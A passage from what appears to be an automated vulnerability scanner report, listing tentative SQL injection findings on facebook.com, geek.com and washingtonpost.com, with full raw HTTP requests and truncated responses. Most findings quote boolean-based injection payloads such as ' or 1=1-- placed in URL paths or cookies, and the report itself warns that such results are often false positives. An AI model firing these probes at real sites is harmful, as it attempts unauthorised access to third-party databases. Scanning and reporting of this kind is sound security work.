X-FB-Server: 10.54.32.56
X-Cnection: close
Date: Tue, 10 May 2011 13:40:14 GMT
Content-Length: 11590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
<script type="text/javascript">window.Bootloader && Bootloader.done(["lIKWr"]);</script></head><body class="transparent_widget safari4 Locale_en_US"><div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;"></div><div id="u481454_1" class="fbConnectWidgetTopmost " style="height:298px; width:313px; border-color:#ffffff;"><div class="phm fbConnectWidgetHeaderTitle uiBoxLightblue"><div class="clearfix"><div class="lfloat"><div class="fbWidgetTitle fsl fwb fcb">Recommendations</div></div><div class="rfloat"></div></div></div><div class="mhs pvm phs ConnectActivityLogin uiBoxWhite"><form action="/campaign/landing.php" target="_blank" onsubmit="return Event.__inlineSubmit(this,event)"><input name="campaign_id" value="137675572948107" type="hidden" /><input name="partner_id" value="cdn.slashgear.com" type="hidden" /><input name="placement" value="recommendations" type="hidden" /><input name="extra_1" value="http://cdn.slashgear.com/fbrecom.html" type="hidden" /><input name="extra_2" value="US" type="hidden" /><label class="mrm fbLoginButton uiButton uiButtonSpecial uiButtonLarge" for="u481454_2"><input value="Sign Up" type="submit" id="u481454_2" /></label></form><div class="ConnectActivityLoginMessage">Create an account or <a onclick="ConnectSocialWidget.getInstance(&quot;u481454_1&quot;).login();"><b>log in</b></a> to see what your friends are recommending.</div></div><div class="fbConnectWidgetContent phs pts"><div class="fbRecommendationWidgetContent" style="visibility:hidden;"><div class="UIImageBlock clearfix pas fbRecommendation RES_734a3eb70875527f"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.slashgear.com/samsung-galaxy-s-ii-revie
...[SNIP]...

Request 2

GET /plugins/recommendations.php?border_color=%23ffffff&header=true&height=300&locale=en_US&sdk=joey&site=http%3A%2F%2Fwww.slashgear.com&width=315 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://cdn.slashgear.com/fbrecom.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo219807859'%20or%201%3d2--%20; lsd=M8vgg

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.96.31
X-Cnection: close
Date: Tue, 10 May 2011 13:40:15 GMT
Content-Length: 11614

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yO/r/sBdNI8BQygP.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/YT_08LAa7Q_.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
<script type="text/javascript">window.Bootloader && Bootloader.done(["lIKWr"]);</script></head><body class="transparent_widget safari4 Locale_en_US"><div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;"></div><div id="u481572_1" class="fbConnectWidgetTopmost " style="height:298px; width:313px; border-color:#ffffff;"><div class="phm fbConnectWidgetHeaderTitle uiBoxLightblue"><div class="clearfix"><div class="lfloat"><div class="fbWidgetTitle fsl fwb fcb">Recommendations</div></div><div class="rfloat"></div></div></div><div class="mhs pvm phs ConnectActivityLogin uiBoxWhite"><form action="/campaign/landing.php" target="_blank" onsubmit="return Event.__inlineSubmit(this,event)"><input name="campaign_id" value="137675572948107" type="hidden" /><input name="partner_id" value="cdn.slashgear.com" type="hidden" /><input name="placement" value="recommendations" type="hidden" /><input name="extra_1" value="http://cdn.slashgear.com/fbrecom.html" type="hidden" /><input name="extra_2" value="US" type="hidden" /><label class="mrm fbLoginButton uiButton uiButtonSpecial uiButtonLarge" for="u481572_2"><input value="Sign Up" type="submit" id="u481572_2" /></label></form><div class="ConnectActivityLoginMessage">Create an account or <a onclick="ConnectSocialWidget.getInstance(&quot;u481572_1&quot;).login();"><b>log in</b></a> to see what your friends are recommending.</div></div><div class="fbConnectWidgetContent phs pts"><div class="fbRecommendationWidgetContent" style="visibility:hidden;"><div class="UIImageBlock clearfix pas fbRecommendation RES_734a3eb70875527f"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.slashgear.com/samsung-galaxy-s-ii-rev
...[SNIP]...

1.25. http://www.geek.com/wp-content/themes/geek6/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.geek.com
Path:   /wp-content/themes/geek6/favicon.ico

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 32327582'%20or%201%3d1--%20 and 32327582'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/themes32327582'%20or%201%3d1--%20/geek6/favicon.ico HTTP/1.1
Host: www.geek.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=225658124.1305033255.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=225658124.910637680.1305033255.1305033255.1305033255.1; __utmc=225658124; __utmb=225658124.1.10.1305033255; s_cc=true; sc_id=null; s_sq=%5B%5BB%5D%5D; __switchTo5x=18; __unam=1c2dd7f-12fda0bbbee-38620289-1; _chartbeat2=8c5rotiu3iho8551

Response 1

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.2.17
Pragma: no-cache
Last-Modified: Tue, 10 May 2011 13:53:41 GMT
Vary: Cookie
X-Pingback: http://www.geek.com/xmlrpc.php
Content-Length: 44315
X-Varnish: 924440538
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate
Expires: Tue, 10 May 2011 13:53:26 GMT
Date: Tue, 10 May 2011 13:53:26 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascri
...[SNIP]...
<img alt="" src="http://www.geek.com/images/phpThumb.php?src=/var/local/geekcom/www/wp-content/uploads/2011/05/PSN_Qriocity1.jpg&amp;w=320&amp;h=220&amp;zc=C" /><br />

<h4><a href="http://www.geek.com/articles/games/sony-delay-switching-psn-back-on-again-free-games-to-be-offered-2011058/">Sony delay switching PSN back on again, free games to be offered</a></h4>
</li>

<li>
<img alt="" src="http://www.geek.com/images/phpThumb.php?src=/var/local/geekcom/www/wp-content/uploads/2011/05/53_Closed_HdOnTouchUp-High-res-e1304991616778.jpg&amp;w=320&amp;h=220&amp;zc=C" /><br />

<h4><a href="http://www.geek.com/articles/chips/panasonic-toughbook-53-annoucement-20110510/">Panasonic trims the semi-rugged Toughbook 53 down to 5.6 pounds</a></h4>
</li>

<li>
<img alt="" src="http://www.geek.com/images/phpThumb.php?src=/var/local/geekcom/www/wp-content/uploads/2011/05/nvidia_icera.jpg&amp;w=320&amp;h=220&amp;zc=C" /><br />

<h4><a href="http://www.geek.com/articles/mobile/nvidia-buys-icera-tegra-to-get-integrated-3g4g-chip-2011059/">Nvidia buys Icera, Tegra to get integrated 3G/4G chip</a></h4>
</li>

<li>
<img alt="" src="http://www.geek.com/images/phpThumb.php?src=/var/local/geekcom/www/wp-content/uploads/2011/05/BlackOps_screen.jpg&amp;w=320&amp;h=220&amp;zc=C" /><br />

<h4><a href="http://www.geek.com/articles/games/activision-confirms-next-cod-will-have-premium-online-features-20110510/">Activision confirms next COD will have premium online features</a></h4>
</li>

<li>
<img alt="" src="http://www.geek.com/images/phpThumb.php?src=/var/local/geekcom/www/wp-content/uploads/2011/05/MS_Skype1.jpg&amp;w=320&amp;h
...[SNIP]...

Request 2

GET /wp-content/themes32327582'%20or%201%3d2--%20/geek6/favicon.ico HTTP/1.1
Host: www.geek.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=225658124.1305033255.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=225658124.910637680.1305033255.1305033255.1305033255.1; __utmc=225658124; __utmb=225658124.1.10.1305033255; s_cc=true; sc_id=null; s_sq=%5B%5BB%5D%5D; __switchTo5x=18; __unam=1c2dd7f-12fda0bbbee-38620289-1; _chartbeat2=8c5rotiu3iho8551

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.2.17
Pragma: no-cache
Last-Modified: Tue, 10 May 2011 13:53:49 GMT
Vary: Cookie
X-Pingback: http://www.geek.com/xmlrpc.php
Content-Length: 44243
X-Varnish: 1842945301
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate
Expires: Tue, 10 May 2011 13:53:29 GMT
Date: Tue, 10 May 2011 13:53:29 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascri
...[SNIP]...
<img alt="" src="http://www.geek.com/images/phpThumb.php?src=/var/local/geekcom/www/wp-content/uploads/2011/05/MS_Skype1.jpg&amp;w=320&amp;h=220&amp;zc=C" /><br />

<h4><a href="http://www.geek.com/articles/geek-pick/microsoft-buys-skype-20110510/">Microsoft buys Skype</a></h4>
</li>

<li>
<img alt="" src="http://www.geek.com/images/phpThumb.php?src=/var/local/geekcom/www/wp-content/uploads/2011/05/Xbox_Next_02.jpg&amp;w=320&amp;h=220&amp;zc=C" /><br />

<h4><a href="http://www.geek.com/articles/games/ea-has-next-xbox-hardware-microsoft-to-reveal-at-e3-2011056/">EA has next Xbox hardware, Microsoft to reveal at E3?</a></h4>
</li>

<li>
<img alt="" src="http://www.geek.com/images/phpThumb.php?src=/var/local/geekcom/www/wp-content/uploads/2011/05/Netflix-Xbox360-580x326.jpg&amp;w=320&amp;h=220&amp;zc=C" /><br />

<h4><a href="http://www.geek.com/articles/geek-pick/chrome-os-to-offer-netflix-support-at-launch-2011059/">Chrome OS to offer Netflix support at launch</a></h4>
</li>

<li>
<img alt="" src="http://www.geek.com/images/phpThumb.php?src=/var/local/geekcom/www/wp-content/uploads/2011/05/Google_Chrome_2011_Wordmark_Logo.jpg&amp;w=320&amp;h=220&amp;zc=C" /><br />

<h4><a href="http://www.geek.com/articles/geek-pick/googles-chrome-browser-has-finally-been-hacked-2011059/">Google&#8217;s Chrome browser has finally been hacked</a></h4>
</li>

<li>
<img alt="" src="http://www.geek.com/images/phpThumb.php?src=/var/local/geekcom/www/wp-content/uploads/2011/05/PSN_Qriocity1.jpg&amp;w=320&amp;h=220&amp;zc=C" /><br />

<h4><a href="http://www.geek.com/articles/games/sony-delay-
...[SNIP]...

1.26. http://www.geek.com/wp-content/themes/geek6/styles/redesign.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.geek.com
Path:   /wp-content/themes/geek6/styles/redesign.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 79240031'%20or%201%3d1--%20 and 79240031'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/themes/geek679240031'%20or%201%3d1--%20/styles/redesign.css?ver=416 HTTP/1.1
Host: www.geek.com
Proxy-Connection: keep-alive
Referer: http://www.geek.com/articles/geek-pick/google-music-to-launch-in-beta-at-io-2011-20110510/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.2.17
Pragma: no-cache
Last-Modified: Tue, 10 May 2011 13:30:02 GMT
Vary: Cookie
X-Pingback: http://www.geek.com/xmlrpc.php
Content-Length: 44307
X-Varnish: 1842939858
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate
Expires: Tue, 10 May 2011 13:29:40 GMT
Date: Tue, 10 May 2011 13:29:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascri
...[SNIP]...
<img alt="" src="http://www.geek.com/images/phpThumb.php?src=/var/local/geekcom/www/wp-content/uploads/2011/05/MS_Skype1.jpg&amp;w=320&amp;h=220&amp;zc=C" /><br />

<h4><a href="http://www.geek.com/articles/geek-pick/microsoft-buys-skype-20110510/">Microsoft buys Skype</a></h4>
</li>

<li>
<img alt="" src="http://www.geek.com/images/phpThumb.php?src=/var/local/geekcom/www/wp-content/uploads/2011/05/Xbox_Next_02.jpg&amp;w=320&amp;h=220&amp;zc=C" /><br />

<h4><a href="http://www.geek.com/articles/games/ea-has-next-xbox-hardware-microsoft-to-reveal-at-e3-2011056/">EA has next Xbox hardware, Microsoft to reveal at E3?</a></h4>
</li>

<li>
<img alt="" src="http://www.geek.com/images/phpThumb.php?src=/var/local/geekcom/www/wp-content/uploads/2011/05/Netflix-Xbox360-580x326.jpg&amp;w=320&amp;h=220&amp;zc=C" /><br />

<h4><a href="http://www.geek.com/articles/geek-pick/chrome-os-to-offer-netflix-support-at-launch-2011059/">Chrome OS to offer Netflix support at launch</a></h4>
</li>

<li>
<img alt="" src="http://www.geek.com/images/phpThumb.php?src=/var/local/geekcom/www/wp-content/uploads/2011/05/Google_Chrome_2011_Wordmark_Logo.jpg&amp;w=320&amp;h=220&amp;zc=C" /><br />

<h4><a href="http://www.geek.com/articles/geek-pick/googles-chrome-browser-has-finally-been-hacked-2011059/">Google&#8217;s Chrome browser has finally been hacked</a></h4>
</li>

<li>
<img alt="" src="http://www.geek.com/images/phpThumb.php?src=/var/local/geekcom/www/wp-content/uploads/2011/05/PSN_Qriocity1.jpg&amp;w=320&amp;h=220&amp;zc=C" /><br />

<h4><a href="http://www.geek.com/articles/games/sony-delay-
...[SNIP]...

Request 2

GET /wp-content/themes/geek679240031'%20or%201%3d2--%20/styles/redesign.css?ver=416 HTTP/1.1
Host: www.geek.com
Proxy-Connection: keep-alive
Referer: http://www.geek.com/articles/geek-pick/google-music-to-launch-in-beta-at-io-2011-20110510/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.2.17
Pragma: no-cache
Last-Modified: Tue, 10 May 2011 13:29:57 GMT
Vary: Cookie
X-Pingback: http://www.geek.com/xmlrpc.php
Content-Length: 44379
X-Varnish: 924435317
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate
Expires: Tue, 10 May 2011 13:29:42 GMT
Date: Tue, 10 May 2011 13:29:42 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascri
...[SNIP]...
<img alt="" src="http://www.geek.com/images/phpThumb.php?src=/var/local/geekcom/www/wp-content/uploads/2011/05/PSN_Qriocity1.jpg&amp;w=320&amp;h=220&amp;zc=C" /><br />

<h4><a href="http://www.geek.com/articles/games/sony-delay-switching-psn-back-on-again-free-games-to-be-offered-2011058/">Sony delay switching PSN back on again, free games to be offered</a></h4>
</li>

<li>
<img alt="" src="http://www.geek.com/images/phpThumb.php?src=/var/local/geekcom/www/wp-content/uploads/2011/05/53_Closed_HdOnTouchUp-High-res-e1304991616778.jpg&amp;w=320&amp;h=220&amp;zc=C" /><br />

<h4><a href="http://www.geek.com/articles/chips/panasonic-toughbook-53-annoucement-20110510/">Panasonic trims the semi-rugged Toughbook 53 down to 5.6 pounds</a></h4>
</li>

<li>
<img alt="" src="http://www.geek.com/images/phpThumb.php?src=/var/local/geekcom/www/wp-content/uploads/2011/05/nvidia_icera.jpg&amp;w=320&amp;h=220&amp;zc=C" /><br />

<h4><a href="http://www.geek.com/articles/mobile/nvidia-buys-icera-tegra-to-get-integrated-3g4g-chip-2011059/">Nvidia buys Icera, Tegra to get integrated 3G/4G chip</a></h4>
</li>

<li>
<img alt="" src="http://www.geek.com/images/phpThumb.php?src=/var/local/geekcom/www/wp-content/uploads/2011/05/BlackOps_screen.jpg&amp;w=320&amp;h=220&amp;zc=C" /><br />

<h4><a href="http://www.geek.com/articles/games/activision-confirms-next-cod-will-have-premium-online-features-20110510/">Activision confirms next COD will have premium online features</a></h4>
</li>

<li>
<img alt="" src="http://www.geek.com/images/phpThumb.php?src=/var/local/geekcom/www/wp-content/uploads/2011/05/MS_Skype1.jpg&amp;w=320&amp;h
...[SNIP]...

1.27. http://www.washingtonpost.com/blogs/right-turn/post/rick-santorum-doesnt-understand-america/2011/03/29/AFHhSbBG_blog.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.washingtonpost.com
Path:   /blogs/right-turn/post/rick-santorum-doesnt-understand-america/2011/03/29/AFHhSbBG_blog.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /blogs/right-turn'%20and%201%3d1--%20/post/rick-santorum-doesnt-understand-america/2011/03/29/AFHhSbBG_blog.html HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/blogs/right-turn/post/rick-santorum-doesnt-understand-america/2011/03/29/AFHhSbBG_blog.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WPNIUCID=WPNI1304310786188.9974; s_vi=[CS]v1|26DEF6EE05011508-40000100A0001105[CE]; s_pers=%20s_nr%3D1305033204715-Repeat%7C1307625204715%3B%20s_lv%3D1305033204717%7C1399641204717%3B%20s_lv_s%3DMore%2520than%25207%2520days%7C1305035004717%3B%20s_vmonthnum%3D1306904400800%2526vn%253D2%7C1306904400800%3B%20s_monthinvisit%3Dtrue%7C1305035004721%3B%20gvp_p5%3Dopinions%253Ablog%253Aright-turn%2520-%2520AFHhSbBG%2520-%252020110506%2520-%2520rick-santorum-doesnt-understand-america%7C1305035004728%3B; s_sess=%20s_cc%3Dtrue%3B%20s_dslv%3DMore%2520than%25207%2520days%3B%20s_wp_ep%3Dblog%3B%20s._ref%3DDirect-Load%3B%20s_sq%3D%3B; __qseg=Q_D|Q_T|Q_2919|Q_1807|Q_1665|Q_1649|Q_1648|Q_1645; rss_now=false; wpni_poe=true; popUpClockCookie=1; popUpOnPreviousPageCookie=true; wp_pageview=1; mbox=check#true#1305033270|session#1305033209163-998563#1305035070; headzip=20001

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
ETag: ac0ea0da-3669-4377-a241-c816535315be
Content-Type: text/html;charset=UTF-8
X-Cnection: close
Cache-Control: no-cache, no-store, must-revalidate
Expires: Tue, 10 May 2011 13:21:51 GMT
Date: Tue, 10 May 2011 13:21:51 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 93185

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="EN" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.fac
...[SNIP]...
<meta name="eomportal-id" content="791677"/>
<meta name="eomportal-loid" content="5.1.1223112133"/>
<meta name="eomportal-uuid" content="b2b264d8-781c-11e0-b1ef-1ae6ee31db4e"/>
<meta name="eomportal-lastUpdate" content="Tue May 10 09:20:03 EDT 2011"/>
<meta name="keywords" content="snatorum,truce not about america,santorum debate"/>
<meta name="description" content="America isn&rsquo;t about his stance on social issues."/>
<meta name="DC.title" content="
Rick Santorum &lsquo;doesn&rsquo;t understand America&rsquo;
"/>
<meta name="DC.date.issued" content="2011-05-07"/>
<meta name="DC.creator" content="Jennifer Rubin"/>
<meta name="Content-Language" content="en-US"/>
<meta name="resource-type" content="document"/>
<link rel="stylesheet" type="text/css" href="/r/sites/twpweb/css/old/old-style.css"/>
<script type="text/javascript">

   //namespace object & initial time always set.
   var TWP_Debug = {};
   TWP_Debug.initialTime = new Date();
   TWP_Debug.pagedebug=(window.location.href.indexOf("pagedebug=true") > 0)?true:false;
   TWP_Debug.pagedebug && window.console && console.log && console.log('[' + (new Date()-TWP_Debug.initialTime)/1000 + ']' + ' frameset - start');

</script>
<script type="text/javascript" src="http://media.washingtonpost.com/wp-srv/ad/wpni_generic_ad.js"></script>
<script type="text/javascript" src="http://media.washingtonpost.com/wp-srv/ad/wp_ad.js"></script>
<script type="text/javascript">

   var siteContext = '/rw/sites/twpweb',
       sectionContext = '/blogs/right-turn',
       eidosBase = 'http://www.washingtonpost.com'
   ;
   TWP = window.TWP || {};
   TWP.base = 'http://media3.washingtonpost.com';
   TWP.eidosBase = eidosBase;

</script>
<script type="text/javascript">
<!--
           var commercialNode = 'opinions';
           var thisNode = 'opinions';
       // -->
       
</script>
<script type="text/javascript">

   wp_meta_data = {
       showAds:true,showPreRollAds:false,isHomepage: false,contentName:["right_turn"],page_id:["5.1.1223112133"],author:["Jennifer Rubin"],keywords:["sn
...[SNIP]...

Request 2

GET /blogs/right-turn'%20and%201%3d2--%20/post/rick-santorum-doesnt-understand-america/2011/03/29/AFHhSbBG_blog.html HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/blogs/right-turn/post/rick-santorum-doesnt-understand-america/2011/03/29/AFHhSbBG_blog.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WPNIUCID=WPNI1304310786188.9974; s_vi=[CS]v1|26DEF6EE05011508-40000100A0001105[CE]; s_pers=%20s_nr%3D1305033204715-Repeat%7C1307625204715%3B%20s_lv%3D1305033204717%7C1399641204717%3B%20s_lv_s%3DMore%2520than%25207%2520days%7C1305035004717%3B%20s_vmonthnum%3D1306904400800%2526vn%253D2%7C1306904400800%3B%20s_monthinvisit%3Dtrue%7C1305035004721%3B%20gvp_p5%3Dopinions%253Ablog%253Aright-turn%2520-%2520AFHhSbBG%2520-%252020110506%2520-%2520rick-santorum-doesnt-understand-america%7C1305035004728%3B; s_sess=%20s_cc%3Dtrue%3B%20s_dslv%3DMore%2520than%25207%2520days%3B%20s_wp_ep%3Dblog%3B%20s._ref%3DDirect-Load%3B%20s_sq%3D%3B; __qseg=Q_D|Q_T|Q_2919|Q_1807|Q_1665|Q_1649|Q_1648|Q_1645; rss_now=false; wpni_poe=true; popUpClockCookie=1; popUpOnPreviousPageCookie=true; wp_pageview=1; mbox=check#true#1305033270|session#1305033209163-998563#1305035070; headzip=20001

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
ETag: 123499df-f418-42c8-bbd3-9d3877605e95
Content-Type: text/html;charset=UTF-8
X-Cnection: close
Cache-Control: no-cache, no-store, must-revalidate
Expires: Tue, 10 May 2011 13:21:51 GMT
Date: Tue, 10 May 2011 13:21:51 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 93143

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="EN" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.fac
...[SNIP]...
<meta name="eomportal-id" content="771352"/>
<meta name="eomportal-loid" content="5.1.1223112133"/>
<meta name="eomportal-uuid" content="b2b264d8-781c-11e0-b1ef-1ae6ee31db4e"/>
<meta name="eomportal-lastUpdate" content="Tue May 10 09:21:43 EDT 2011"/>
<meta name="keywords" content="snatorum,truce not about america,santorum debate"/>
<meta name="description" content="America isn&rsquo;t about his stance on social issues."/>
<meta name="DC.title" content="
Rick Santorum &lsquo;doesn&rsquo;t understand America&rsquo;
"/>
<meta name="DC.date.issued" content="2011-05-07"/>
<meta name="DC.creator" content="Jennifer Rubin"/>
<meta name="Content-Language" content="en-US"/>
<meta name="resource-type" content="document"/>
<link rel="stylesheet" type="text/css" href="/r/sites/twpweb/css/old/old-style.css"/>
<script type="text/javascript">

   //namespace object & initial time always set.
   var TWP_Debug = {};
   TWP_Debug.initialTime = new Date();
   TWP_Debug.pagedebug=(window.location.href.indexOf("pagedebug=true") > 0)?true:false;
   TWP_Debug.pagedebug && window.console && console.log && console.log('[' + (new Date()-TWP_Debug.initialTime)/1000 + ']' + ' frameset - start');

</script>
<script type="text/javascript" src="http://media.washingtonpost.com/wp-srv/ad/wpni_generic_ad.js"></script>
<script type="text/javascript" src="http://media.washingtonpost.com/wp-srv/ad/wp_ad.js"></script>
<script type="text/javascript">

   var siteContext = '/rw/sites/twpweb',
       sectionContext = '/blogs/right-turn',
       eidosBase = 'http://www.washingtonpost.com'
   ;
   TWP = window.TWP || {};
   TWP.base = 'http://media3.washingtonpost.com';
   TWP.eidosBase = eidosBase;

</script>
<script type="text/javascript">
<!--
           var commercialNode = 'opinions';
           var thisNode = 'opinions';
       // -->
       
</script>
<script type="text/javascript">

   wp_meta_data = {
       showAds:true,showPreRollAds:false,isHomepage: false,contentName:["right_turn"],page_id:["5.1.1223112133"],author:["Jennifer Rubin"],keywords:["sn
...[SNIP]...

1.28. http://www.washingtonpost.com/blogs/right-turn/post/rick-santorum-doesnt-understand-america/2011/03/29/AFHhSbBG_blog.html [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.washingtonpost.com
Path:   /blogs/right-turn/post/rick-santorum-doesnt-understand-america/2011/03/29/AFHhSbBG_blog.html

Issue detail

